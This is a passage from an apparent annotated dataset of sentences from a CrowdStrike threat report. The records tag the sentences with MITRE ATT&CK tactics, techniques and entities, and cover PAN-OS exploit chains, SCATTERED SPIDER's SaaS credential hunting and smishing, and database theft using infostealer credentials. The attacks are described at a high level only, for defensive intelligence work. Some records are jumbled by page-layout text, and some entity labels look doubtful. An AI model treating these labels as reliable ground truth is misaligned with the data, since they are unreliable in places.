"46_crowdstrike_report", "page_number": 38, "sentence_id": 347, "context_before": "Much of the exploitation activity discussed in this report occurred after the vulnerabilities were publicly disclosed and patches became available.", "sentence_text": "REDUCING THE RISK OF VULNERABILITY EXPLOITATION Diligently applying vendor patches and other applicable mitigations/workarounds against known vulnerabilities will reduce the risk of exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s348-86a57b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 348, "context_before": "REDUCING THE RISK OF VULNERABILITY EXPLOITATION Diligently applying vendor patches and other applicable mitigations/workarounds against known vulnerabilities will reduce the risk of exploitation.", "sentence_text": "To prevent zero-day vulnerability exploitation, security teams can implement a defense-in-depth approach to detect and remediate malicious activity before an attacker can reach their objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s349-832cc4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 349, "context_before": "To prevent zero-day vulnerability exploitation, security teams can implement a defense-in-depth approach to detect and remediate malicious activity before an attacker can reach their objectives.", "sentence_text": "Other best practices — such as server/application isolation and sandboxing, network segmentation, and adherence to least-privilege principles — can help prevent or limit the impact of malicious activity as well as protect against zero-day and n-day exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s350-8c7ffa", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 350, "context_before": "Other best practices — such as server/application isolation and sandboxing, network segmentation, and adherence to least-privilege principles — can help prevent or limit the impact of malicious activity as well as protect against zero-day and n-day exploitation.", "sentence_text": "Using extended detection and response (XDR) technology, such as CrowdStrike Falcon® Insight XDR, as an additional layer of detection and protection on servers hosting public-facing applications can also reduce response times.4 Network Perimeter Device Targeting In 2024, threat actors continued to target devices on the network periphery, frequently leveraging industry vulnerability research — including disclosures, technical blogs, and POC exploits — to support their malicious activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s351-15c3fd", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 351, "context_before": "Using extended detection and response (XDR) technology, such as CrowdStrike Falcon® Insight XDR, as an additional layer of detection and protection on servers hosting public-facing applications can also reduce response times.4 Network Perimeter Device Targeting In 2024, threat actors continued to target devices on the network periphery, frequently leveraging industry vulnerability research — including disclosures, technical blogs, and POC exploits — to support their malicious activities.", "sentence_text": "The breadth and scope of compromised Palo Alto Networks perimeter devices exemplify threat actors’ persistence, objectives, and imagination in perimeter device exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s352-058831", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 352, "context_before": "The breadth and scope of compromised Palo Alto Networks perimeter devices exemplify threat actors’ persistence, objectives, and imagination in perimeter device exploitation.", "sentence_text": "Since November 14, 2024, or earlier, at least one unidentified threat actor has chained an authentication bypass vulnerability (CVE-2024-0012) with a privilege escalation vulnerability (CVE-2024-9474) in the Management Web Interface of Palo Alto Networks’ PAN-OS software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "A threat actor chained CVE-2024-0012 and CVE-2024-9474 in PAN-OS to bypass authentication and escalate privileges.", "entities": [ { "text": "threat actor", "start": 63, "end": 75, "label": "ThreatActor" }, { "text": "chained an authentication bypass vulnerability", "start": 80, "end": 126, "label": "Action" }, { "text": "CVE-2024-0012", "start": 128, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-9474", "start": 186, "end": 199, "label": "Infrastructure_Indicator" }, { "text": "Palo Alto Networks’ PAN-OS", "start": 236, "end": 262, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s353-2da626", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 353, "context_before": "Since November 14, 2024, or earlier, at least one unidentified threat actor has chained an authentication bypass vulnerability (CVE-2024-0012) with a privilege escalation vulnerability (CVE-2024-9474) in the Management Web Interface of Palo Alto Networks’ PAN-OS software.", "sentence_text": "The vulnerabilities’ public disclosure and subsequent industry reporting almost certainly prompted additional threat actors to adopt the CVE-2024-0012 and CVE-2024-9474 exploit chain.\n4 https://www.crowdstrike.com/platform/endpoint-security/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s354-04f096", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 354, "context_before": "The vulnerabilities’ public disclosure and subsequent industry reporting almost certainly prompted additional threat actors to adopt the CVE-2024-0012 and CVE-2024-9474 exploit chain.\n4 https://www.crowdstrike.com/platform/endpoint-security/", "sentence_text": "The vendor’s disclosure statement acknowledged an attacker could exploit these vulnerabilities to read Expedition database contents and/or write arbitrary files to temporary storage locations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s355-ffc01b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 355, "context_before": "The vendor’s disclosure statement acknowledged an attacker could exploit these vulnerabilities to read Expedition database contents and/or write arbitrary files to temporary storage locations.", "sentence_text": "On the same day, the industry source that discovered CVE-2024-9464, CVE-2024-9465, and CVE-2024-9466 released a technical blog providing exploitation guidance for all three vulnerabilities as well as CVE-2024-5910, which was previously disclosed by Palo Alto Networks in July 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s356-424afb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 356, "context_before": "On the same day, the industry source that discovered CVE-2024-9464, CVE-2024-9465, and CVE-2024-9466 released a technical blog providing exploitation guidance for all three vulnerabilities as well as CVE-2024-5910, which was previously disclosed by Palo Alto Networks in July 2024.", "sentence_text": "Within 24 hours of disclosure, CrowdStrike Intelligence captured HTTP requests consistent with CVE-2024-5910, CVE-2024-9463, and CVE-2024-9465 exploitation.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Observed HTTP requests indicating exploitation attempts of CVE-2024-5910, CVE-2024-9463, and CVE-2024-9465 shortly after disclosure.", "entities": [ { "text": "captured HTTP requests consistent with CVE-2024-5910, CVE-2024-9463, and CVE-2024-9465 exploitation", "start": 56, "end": 155, "label": "Action" }, { "text": "CVE-2024-5910", "start": 95, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-9463", "start": 110, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-9465", "start": 129, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s357-fd8cc9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 357, "context_before": "Within 24 hours of disclosure, CrowdStrike Intelligence captured HTTP requests consistent with CVE-2024-5910, CVE-2024-9463, and CVE-2024-9465 exploitation.", "sentence_text": "Threat actors’ initial post-exploitation activities — including cryptomining, malware deployment, and basic reconnaissance — were common for opportunistic exploitation activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s358-dcbcb8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 358, "context_before": "Threat actors’ initial post-exploitation activities — including cryptomining, malware deployment, and basic reconnaissance — were common for opportunistic exploitation activity.", "sentence_text": "However, on October 18, 2024, CrowdStrike Intelligence observed CVE-2024-5910 exploitation that likely originated from two IP addresses connected to a China-nexus ORB network (Figure 19).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Observed exploitation of CVE-2024-5910 originating from attacker-controlled IP infrastructure.", "entities": [ { "text": "observed CVE-2024-5910 exploitation", "start": 55, "end": 90, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s359-c37028", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 359, "context_before": "However, on October 18, 2024, CrowdStrike Intelligence observed CVE-2024-5910 exploitation that likely originated from two IP addresses connected to a China-nexus ORB network (Figure 19).", "sentence_text": "KEY\nJUL 10 OCT 9 OCT 10 Public Technical Blog First Observed Disclosure First POC Exploitation CVE-2024-5910 CVE-2024-9465 CVE-2024-9463 CVE-2024-9466 OCT 9 OCT 12 OCT 11 OCT 10 Public First Observed Technical Blog First POC Disclosure Exploitation OCT 9 OCT 18 OCT 11 Public Disclosure First ORB01 First Observed Technical Blog Exploitation Exploitation First POC", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s360-58e845", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 360, "context_before": "KEY\nJUL 10 OCT 9 OCT 10 Public Technical Blog First Observed Disclosure First POC Exploitation CVE-2024-5910 CVE-2024-9465 CVE-2024-9463 CVE-2024-9466 OCT 9 OCT 12 OCT 11 OCT 10 Public First Observed Technical Blog First POC Disclosure Exploitation OCT 9 OCT 18 OCT 11 Public Disclosure First ORB01 First Observed Technical Blog Exploitation Exploitation First POC", "sentence_text": "OCT 14 OCT 9 First Observed Public Disclosure Exploitation Technical Blog Attempts JUL OCT Each of the Palo Alto Networks vulnerabilities described in this section provides the necessary information and/or privileges to facilitate malicious activity on victim networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p39-s361-8a0f0b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 39, "sentence_id": 361, "context_before": "OCT 14 OCT 9 First Observed Public Disclosure Exploitation Technical Blog Attempts JUL OCT Each of the Palo Alto Networks vulnerabilities described in this section provides the necessary information and/or privileges to facilitate malicious activity on victim networks.", "sentence_text": "Compromising such devices can allow attackers to achieve the following objectives:\n• Easily conduct lateral movement across the victim’s network • Monitor, divert, or detect network traffic • Accept or drop specific network traffic", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s362-7255a1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 362, "context_before": "Compromising such devices can allow attackers to achieve the following objectives:\n• Easily conduct lateral movement across the victim’s network • Monitor, divert, or detect network traffic • Accept or drop specific network traffic", "sentence_text": "SAAS EXPLOITATION\nLIKELY TO CONTINUE In 2025, enterprising adversaries will undoubtedly continue to seek advanced exploitation opportunities across multiple domains, specifically cloud-based SaaS applications, to access sensitive data and conduct lateral movement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s363-62d85d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 363, "context_before": "SAAS EXPLOITATION\nLIKELY TO CONTINUE In 2025, enterprising adversaries will undoubtedly continue to seek advanced exploitation opportunities across multiple domains, specifically cloud-based SaaS applications, to access sensitive data and conduct lateral movement.", "sentence_text": "With many organizations migrating data from on-premises systems to cloud-based services, adversaries are expected to continue to adapt their tradecraft accordingly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s364-aafcb9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 364, "context_before": "With many organizations migrating data from on-premises systems to cloud-based services, adversaries are expected to continue to adapt their tradecraft accordingly.", "sentence_text": "Throughout 2024, CrowdStrike Intelligence observed several eCrime and targeted intrusion adversaries leverage access to cloud-based SaaS applications to obtain data to facilitate lateral movement, extortion, and downstream targeting of third parties.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage Object" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Adversaries leverage access to cloud-based SaaS applications to collect data, which is then used to enable lateral movement, extortion, and further targeting of additional victims.", "entities": [ { "text": "leverage access to cloud-based SaaS applications", "start": 101, "end": 149, "label": "Action" }, { "text": "obtain data", "start": 153, "end": 164, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s365-8cc251", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 365, "context_before": "Throughout 2024, CrowdStrike Intelligence observed several eCrime and targeted intrusion adversaries leverage access to cloud-based SaaS applications to obtain data to facilitate lateral movement, extortion, and downstream targeting of third parties.", "sentence_text": "SaaS exploitation will therefore be a threat to watch in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s366-6c68c0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 366, "context_before": "SaaS exploitation will therefore be a threat to watch in 2025.", "sentence_text": "In most relevant cases, threat actors accessed SaaS applications after compromising an SSO identity.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Threat actors compromised SSO identities and used them to access SaaS applications.", "entities": [ { "text": "threat actors", "start": 24, "end": 37, "label": "ThreatActor" }, { "text": "accessed SaaS applications after compromising an SSO identity", "start": 38, "end": 99, "label": "Action" }, { "text": "SSO identity", "start": 87, "end": 99, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s367-9526e1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 367, "context_before": "SMS DISTRIBUTION ENABLES THREAT ACTOR TO APPLICATION DISTRIBUTE SMISHING MESSAGES TO THIRD PARTIES THREAT ACTOR COMPROMISED DOCUMENT MANAGEMENT AND ENABLES THREAT ACTOR TO SSO IDENTITY STORAGE APPLICATION IDENTIFY SENSITIVE DATA FOR EXFILTRATION CREDENTIAL MANAGEMENT ENABLES THREAT APPLICATION ACTOR TO COMPROMISE PRIVILEGED ACCOUNTS In most relevant cases, threat actors accessed SaaS applications after compromising an SSO identity.", "sentence_text": "eCrime adversary SCATTERED SPIDER has employed this tactic since at least 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s368-5b454e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 368, "context_before": "eCrime adversary SCATTERED SPIDER has employed this tactic since at least 2022.", "sentence_text": "In many intrusions, the adversary searched these applications for account credentials and network architecture documentation.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087", "name": "Account Discovery" }, { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "The adversary searched applications to locate account credentials and network architecture documentation for further operations.", "entities": [ { "text": "the adversary", "start": 20, "end": 33, "label": "ThreatActor" }, { "text": "searched these applications for account credentials and network architecture documentation", "start": 34, "end": 124, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p40-s369-dc5f73", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 40, "sentence_id": 369, "context_before": "In many intrusions, the adversary searched these applications for the following information:\n• Account credentials and network architecture documentation to conduct lateral movement •", "sentence_text": "Cyber insurance and revenue information to inform extortion demands", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s370-b59f70", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 370, "context_before": "Cyber insurance and revenue information to inform extortion demands", "sentence_text": "threat actors: SharePoint and Outlook were accessed in 22% and 17%, respectively, of relevant intrusions in the first half of 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s371-297b56", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 371, "context_before": "threat actors: SharePoint and Outlook were accessed in 22% and 17%, respectively, of relevant intrusions in the first half of 2024.", "sentence_text": "SCATTERED SPIDER often uses strings such as password manager, server inventory, and vpn instructions to search compromised SharePoint tenants and mailboxes for data that will aid further account compromise and lateral movement to on-premises systems.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" }, { "id": "T1087", "name": "Account Discovery" } ], "procedure": "SCATTERED SPIDER searches compromised SharePoint tenants and mailboxes using specific keywords to identify sensitive data for further account compromise and lateral movement.", "entities": [ { "text": "SCATTERED SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "uses strings such as password manager, server inventory, and vpn instructions to search compromised SharePoint tenants and mailboxes", "start": 23, "end": 155, "label": "Action" }, { "text": "SharePoint tenants", "start": 123, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "mailboxes", "start": 146, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s372-a63f9e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 372, "context_before": "SCATTERED SPIDER often uses strings such as password manager, server inventory, and vpn instructions to search compromised SharePoint tenants and mailboxes for data that will aid further account compromise and lateral movement to on-premises systems.", "sentence_text": "Many organizations do not audit the data that employees upload to cloud-based storage repositories (such as SharePoint)\nor transmit internally via email, making these resources valuable targets for adversaries seeking to pivot within victim environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s373-c6d3d3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 373, "context_before": "Many organizations do not audit the data that employees upload to cloud-based storage repositories (such as SharePoint)\nor transmit internally via email, making these resources valuable targets for adversaries seeking to pivot within victim environments.", "sentence_text": "Threat actors can also leverage access to SaaS tooling to facilitate downstream targeting of third parties.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s374-8de7cc", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 374, "context_before": "Threat actors can also leverage access to SaaS tooling...", "sentence_text": "In 2024, SCATTERED SPIDER obtained API keys to a commercial SMS distribution application from a compromised email inbox.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "The adversary obtained API keys from a compromised email inbox to access an SMS distribution service.", "entities": [ { "text": "SCATTERED SPIDER", "start": 9, "end": 25, "label": "ThreatActor" }, { "text": "obtained API keys to a commercial SMS distribution application from a compromised email inbox", "start": 26, "end": 119, "label": "Action" }, { "text": "API keys", "start": 35, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "SMS distribution application", "start": 60, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "email inbox", "start": 108, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s375-fe37ad", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 375, "context_before": "In 2024, SCATTERED SPIDER obtained API keys to a commercial SMS distribution application from a compromised email inbox.", "sentence_text": "The adversary subsequently used the application to send more than 700,000 SMS messages containing links to AITM phishing and cryptocurrency drainer pages.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Phishing: Spearphishing Link" } ], "procedure": "The adversary used a compromised SMS distribution application to send large-scale phishing messages containing links to AITM phishing and cryptocurrency drainer pages.", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "used the application to send more than 700,000 SMS messages", "start": 27, "end": 86, "label": "Action" }, { "text": "AITM phishing", "start": 107, "end": 120, "label": "Action" }, { "text": "cryptocurrency drainer pages", "start": 125, "end": 153, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s376-d19361", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 376, "context_before": "The adversary subsequently used the application to send more than 700,000 SMS messages containing links to AITM phishing and cryptocurrency drainer pages.", "sentence_text": "The eCrime threat actor tracked in industry reporting as Atlas Lion adeptly abuses SaaS applications in their gift card fraud campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s377-93f8c3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 377, "context_before": "The eCrime threat actor tracked in industry reporting as Atlas Lion adeptly abuses SaaS applications in their gift card fraud campaigns.", "sentence_text": "Similar to SCATTERED SPIDER, Atlas Lion often gains initial access via SMS phishing (smishing), typically obtaining Microsoft 365 credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s378-35c2b1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 378, "context_before": "Similar to SCATTERED SPIDER...", "sentence_text": "They use their access to compromised mailboxes to perform internal phishing in support of lateral movement.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "The adversary uses compromised mailboxes to conduct internal phishing to facilitate lateral movement.", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "use their access to compromised mailboxes to perform internal phishing", "start": 5, "end": 75, "label": "Action" }, { "text": "compromised mailboxes", "start": 25, "end": 46, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s379-1f9e64", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 379, "context_before": "They use their access to compromised mailboxes to perform internal phishing in support of lateral movement.", "sentence_text": "Customer Database Compromise Campaign Malicious access to SaaS applications does not always follow a broader network compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s380-e70be1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 380, "context_before": "Customer Database Compromise Campaign Malicious access to SaaS applications does not always follow a broader network compromise.", "sentence_text": "In April 2024 and May 2024, a threat actor conducted a widely reported data theft and extortion campaign targeting customers of a data warehousing platform.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "A threat actor conducted a campaign involving data theft and extortion targeting customers of a data warehousing platform.", "entities": [ { "text": "a threat actor", "start": 28, "end": 42, "label": "ThreatActor" }, { "text": "conducted a widely reported data theft and extortion campaign", "start": 43, "end": 104, "label": "Action" }, { "text": "data warehousing platform", "start": 130, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s381-bb8259", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 381, "context_before": "In April 2024 and May 2024, a threat actor conducted a widely reported data theft and extortion campaign targeting customers of a data warehousing platform.", "sentence_text": "To access customer database instances that did not require MFA or other controls such as network access policies, the threat actor leveraged compromised credentials obtained from information stealer logs that were widely available in eCrime channels and marketplaces.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The threat actor used compromised credentials from information stealer logs to access customer database instances lacking MFA or network access controls.", "entities": [ { "text": "the threat actor", "start": 114, "end": 130, "label": "ThreatActor" }, { "text": "leveraged compromised credentials obtained from information stealer logs", "start": 131, "end": 203, "label": "Action" }, { "text": "information stealer logs", "start": 179, "end": 203, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s382-1309ff", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 382, "context_before": "To access customer database instances that did not require MFA or other controls such as network access policies, the threat »MANY ORGANIZATIONS DO NOT AUDITactor leveraged compromised credentials obtained from information stealer logs that were widely available in eCrime channels and marketplaces.", "sentence_text": "THE DATA THAT EMPLOYEES UPLOAD TO CLOUD-BASED STORAGE REPOSITORIES (SUCH AS SHAREPOINT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s383-d4a050", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 383, "context_before": "THE DATA THAT EMPLOYEES UPLOAD TO CLOUD-BASED STORAGE REPOSITORIES (SUCH AS SHAREPOINT)", "sentence_text": "OR TRANSMIT This campaign targeted only the organizations’ database instances, and no INTERNALLY VIA EMAIL, MAKING THESE lateral movement or malicious activity impacting other applications or systems RESOURCES VALUABLE TARGETS FOR was observed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s384-fa08d4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 384, "context_before": "OR TRANSMIT This campaign targeted only the organizations’ database instances, and no INTERNALLY VIA EMAIL, MAKING THESE lateral movement or malicious activity impacting other applications or systems RESOURCES VALUABLE TARGETS FOR was observed.", "sentence_text": "Threat actors could apply this tradecraft to steal data from other ADVERSARIES SEEKING TO PIVOT public-facing databases or cloud storage platforms not secured by MFA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s385-d5f770", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 385, "context_before": "Threat actors could apply this tradecraft to steal data from other ADVERSARIES SEEKING TO PIVOT public-facing databases or cloud storage platforms not secured by MFA.", "sentence_text": "WITHIN VICTIM ENVIRONMENTS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s386-e714f5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 386, "context_before": "WITHIN VICTIM ENVIRONMENTS.", "sentence_text": "Adversaries will highly likely continue to target SaaS applications in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p41-s387-5f831b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 41, "sentence_id": 387, "context_before": "Adversaries will highly likely continue to target SaaS applications in 2025.", "sentence_text": "This assessment is made with moderate confidence based on the proliferation of eCrime activity targeting SSO accounts and other relevant identities throughout 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s388-a15fbb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 388, "context_before": "This assessment is made with moderate confidence based on the proliferation of eCrime activity targeting SSO accounts and other relevant identities throughout 2024.", "sentence_text": "Given that malicious access to SaaS applications typically begins with an identity compromise, relevant campaigns are best mitigated by hardening accounts with MFA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s389-4a2f15", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 389, "context_before": "Given that malicious access to SaaS applications typically begins with an identity compromise, relevant campaigns are best mitigated by hardening accounts with MFA.", "sentence_text": "Moreover, organizations should enforce MFA policies with secure verification methods across all accounts and regularly review any trusted zones or restriction exceptions to avoid unfettered access scenarios.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s390-7fd82b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 390, "context_before": "Moreover, organizations should enforce MFA policies with secure verification methods across all accounts and regularly review any trusted zones or restriction exceptions to avoid unfettered access scenarios.", "sentence_text": "MITIGATION RECOMMENDATIONS\nOrganizations can further strengthen their defenses against SaaS compromise by implementing the following mitigation strategies:\nImplement strong identity and access management (IAM)\n• Use MFA for all user accounts •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s391-f6fd8d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 391, "context_before": "MITIGATION RECOMMENDATIONS\nOrganizations can further strengthen their defenses against SaaS compromise by implementing the following mitigation strategies:\nImplement strong identity and access management 